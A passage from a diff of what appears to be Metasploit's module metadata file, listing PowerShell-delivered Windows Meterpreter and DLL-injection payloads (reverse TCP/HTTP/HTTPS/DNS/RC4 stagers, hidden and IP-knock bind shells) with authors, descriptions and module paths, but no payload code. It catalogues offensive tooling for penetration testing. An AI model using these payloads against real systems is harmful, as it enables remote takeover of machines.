"windows/meterpreter/reverse_http_proxy_pstore", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_https": { - "name": "Powershell Exec, Windows Reverse HTTPS Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_https" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker 
over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_named_pipe": { - "name": "Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - 
"spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - 
"Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - 
"ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": 
"payload/cmd/windows/powershell/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_winhttp": { - "name": "Powershell Exec, Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": 
null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_winhttps": { - "name": "Powershell Exec, Windows Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_winhttps" - }, - 
"payload_cmd/windows/powershell/metsvc_bind_tcp": { - "name": "Powershell Exec, Windows Meterpreter Service, Bind TCP", - "fullname": "payload/cmd/windows/powershell/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/metsvc_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/metsvc_reverse_tcp": { - "name": "Powershell Exec, Windows Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/cmd/windows/powershell/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": 
false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/metsvc_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": 
"payload/cmd/windows/powershell/patchupdllinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - 
"fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_tcp": { - "name": "Powershell Exec, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from 
a command via PowerShell.\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_tcp_uuid", - "staged": true, - "stage_refname": 
